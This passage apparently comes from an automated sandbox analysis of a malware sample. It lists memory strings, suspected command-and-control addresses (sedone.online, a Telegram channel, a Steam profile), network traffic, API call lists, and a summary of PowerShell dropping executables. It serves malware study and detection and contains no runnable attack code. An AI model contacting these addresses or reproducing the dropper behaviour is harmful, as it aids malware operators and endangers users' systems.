            Source: chrome.exe, 0000001D.00000003.2537526965.00006004010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537661189.000060040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537322593.000060040040C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
            Source: chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
            Source: chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
            Source: chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
            Source: chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
            Source: chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
            Source: Corrections.com, 0000001A.00000002.3007890735.000000000412A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://sedone.online
            Source: Corrections.com, 0000001A.00000002.3007890735.000000000412A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://sedone.online.ioming
            Source: Corrections.com, 0000001A.00000002.3002616459.0000000000EA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sedone.online/
            Source: Corrections.com, 0000001A.00000002.3002616459.0000000000EA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sedone.online/Z
            Source: Corrections.com, 0000001A.00000002.3004390803.00000000038DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sedone.online/emp
            Source: Corrections.com, 0000001A.00000002.3002616459.0000000000EA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sedone.online/h
            Source: Corrections.com, 0000001A.00000002.3004390803.00000000038DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sedone.online/oft
            Source: Corrections.com, 0000001A.00000002.3002616459.0000000000EA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sedone.online/~
            Source: Corrections.com, 0000001A.00000002.3007890735.00000000040C9000.00000040.00001000.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3007890735.000000000412A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://sedone.online;
            Source: Corrections.com, 0000001A.00000002.3007890735.000000000412A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://sedone.onlineNGVAA
            Source: Corrections.com, 0000001A.00000002.3007890735.000000000412A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://sedone.onlineR90Z
            Source: Corrections.com, 0000001A.00000002.3007890735.000000000412A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://sedone.onlineWXYZ1234567890a
            Source: Corrections.com, 0000001A.00000002.3007890735.00000000041EC000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://sedone.onlineWXYZ1234567890isposition:
            Source: chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
            Source: chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
            Source: chrome.exe, 0000001D.00000003.2555933219.0000600400294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: chrome.exe, 0000001D.00000003.2578370556.000060040304C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578206013.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577269475.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577570541.0000600402FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578643950.0000600401C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
            Source: Corrections.com, 0000001A.00000002.3002616459.0000000000E03000.00000004.00000020.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3004594101.000000000392E000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000003.2335721336.00000000039C0000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000003.2335361958.0000000004048000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000003.2335086597.0000000003B00000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3004390803.00000000038A0000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000003.2335230386.0000000000E1C000.00000004.00000020.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3007890735.0000000004041000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199807592927
            Source: Corrections.com, 0000001A.00000002.3007890735.0000000004041000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199807592927d0wntgMozilla/5.0
            Source: Corrections.com, 0000001A.00000002.3009200532.0000000005FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: Corrections.com, 0000001A.00000002.3009200532.0000000005FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: Corrections.com, 0000001A.00000002.3004996971.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, EKNYUS.26.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: Corrections.com, 0000001A.00000002.3004996971.00000000039A2000.00000004.00000800.00020000.00000000.sdmp, EKNYUS.26.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: Corrections.com, 0000001A.00000002.3004996971.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, EKNYUS.26.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: Corrections.com, 0000001A.00000002.3004996971.00000000039A2000.00000004.00000800.00020000.00000000.sdmp, EKNYUS.26.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: Corrections.com, 0000001A.00000003.2334909067.00000000038A1000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000003.2335491745.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, Corrections.com, 0000001A.00000003.2334763783.000000000392F000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3002616459.0000000000DB4000.00000004.00000020.00020000.00000000.sdmp, Corrections.com, 0000001A.00000003.2334820485.000000000392F000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000003.2335456362.00000000038C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/
            Source: Corrections.com, 0000001A.00000002.3004390803.00000000038A0000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000003.2335230386.0000000000E1C000.00000004.00000020.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3004594101.0000000003966000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3007890735.000000000409A000.00000040.00001000.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3007890735.0000000004041000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/detct0r
            Source: Corrections.com, 0000001A.00000002.3004390803.00000000038A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/detct0r13
            Source: Corrections.com, 0000001A.00000002.3007890735.0000000004041000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/detct0rd0wntgMozilla/5.0
            Source: Corrections.com, 0000001A.00000002.3004594101.0000000003966000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3007890735.000000000409A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
            Source: Corrections.com, 0000001A.00000002.3006622611.0000000003B40000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3004996971.00000000039FA000.00000004.00000800.00020000.00000000.sdmp, K6XT0Z.26.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
            Source: Colonial.16.drString found in binary or memory: https://www.autoitscript.com/autoit3/
            Source: Corrections.com, 0000001A.00000002.3004594101.0000000003992000.00000004.00000800.00020000.00000000.sdmp, 9ZCBA1.26.drString found in binary or memory: https://www.ecosia.org/newtab/
            Source: chrome.exe, 0000001D.00000003.2532799851.0000600400C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2557159264.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2581109973.0000600400C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537282781.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2567164223.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2557743072.0000600400C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
            Source: chrome.exe, 0000001D.00000003.2532799851.0000600400C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2557159264.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2581109973.0000600400C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537282781.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2567164223.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2557743072.0000600400C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
            Source: chrome.exe, 0000001D.00000003.2532799851.0000600400C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2557159264.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2581109973.0000600400C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537282781.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2567164223.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2557743072.0000600400C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
            Source: Corrections.com, 0000001A.00000002.3006622611.0000000003B40000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3004996971.00000000039FA000.00000004.00000800.00020000.00000000.sdmp, K6XT0Z.26.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
            Source: Colonial.16.drString found in binary or memory: https://www.globalsign.com/repository/0
            Source: chrome.exe, 0000001D.00000003.2555933219.0000600400294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
            Source: chrome.exe, 0000001D.00000003.2555933219.0000600400294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: chrome.exe, 0000001D.00000003.2555933219.0000600400294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2534673589.0000600400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537322593.0000600400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2532253880.0000600400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2533855821.0000600400454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: chrome.exe, 0000001D.00000003.2518269770.00006004004BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2532761049.0000600400CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2534673589.0000600400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537322593.0000600400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2533336865.0000600400D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2532253880.0000600400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2533855821.0000600400454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
            Source: chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
            Source: chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
            Source: Corrections.com, 0000001A.00000002.3004594101.0000000003992000.00000004.00000800.00020000.00000000.sdmp, 9ZCBA1.26.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: chrome.exe, 0000001D.00000003.2578370556.000060040304C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578206013.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577269475.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577570541.0000600402FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578643950.0000600401C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
            Source: chrome.exe, 0000001D.00000003.2578643950.0000600401C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
            Source: chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
            Source: chrome.exe, 0000001D.00000003.2537322593.000060040040C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
            Source: chrome.exe, 0000001D.00000003.2555933219.0000600400294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
            Source: chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
            Source: chrome.exe, 0000001D.00000003.2572689155.0000600402AAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2572722383.0000600402AB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2572653266.0000600402AA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
            Source: chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
            Source: chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
            Source: chrome.exe, 0000001D.00000003.2555933219.0000600400294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: chrome.exe, 0000001D.00000003.2555933219.0000600400294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: chrome.exe, 0000001D.00000003.2578643950.0000600401C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
            Source: chrome.exe, 0000001D.00000003.2578061639.0000600403074000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577681334.00006004030D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578370556.000060040304C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578206013.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577269475.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578643950.0000600401C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
            Source: chrome.exe, 0000001D.00000003.2577269475.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577570541.0000600402FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578643950.0000600401C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
            Source: chrome.exe, 0000001D.00000003.2577269475.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577570541.0000600402FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578643950.0000600401C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
            Source: Corrections.com, 0000001A.00000002.3009200532.0000000005FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: Corrections.com, 0000001A.00000002.3009200532.0000000005FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: Corrections.com, 0000001A.00000002.3009200532.0000000005FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: Corrections.com, 0000001A.00000002.3009200532.0000000005FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: Corrections.com, 0000001A.00000002.3009200532.0000000005FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
            Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
            Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
            Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
            Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
            Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
            Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
            Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
            Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49756 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.4:49764 version: TLS 1.2
            Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 16_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,16_2_004050F9
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FBF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,26_2_00FBF7C7
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FBF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,26_2_00FBF55C
            Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 16_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,16_2_004044D1
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FD9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,26_2_00FD9FD2

            System Summary

            barindex
            Powershell drops PE file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lem[1].exeJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\putt.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00F5FFE0 CloseHandle,NtProtectVirtualMemory,26_2_00F5FFE0
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FB4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,26_2_00FB4763
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FA1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,26_2_00FA1B4D
            Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 16_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,16_2_004038AF
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comCode function: 26_2_00FAF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,26_2_00FAF20D
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\625ebd.msiJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI60C0.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI614E.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI619D.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{C1234A01-14E3-4FC1-94A4-06C00CB5F0E2}Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI63A2.tmpJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\625ebf.msiJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\625ebf.msiJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI64FB.tmpJump to behavior
            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
            Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI60C0.tmpJump to behavior
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F46AC04_2_00007FF749F46AC0
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F7FB184_2_00007FF749F7FB18
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F8AB404_2_00007FF749F8AB40
            Source: C:\Windows\Installer\MSI64FB.tmpCode function: 4_2_00007FF749F5AB4C4_2_00007FF749F5AB4C
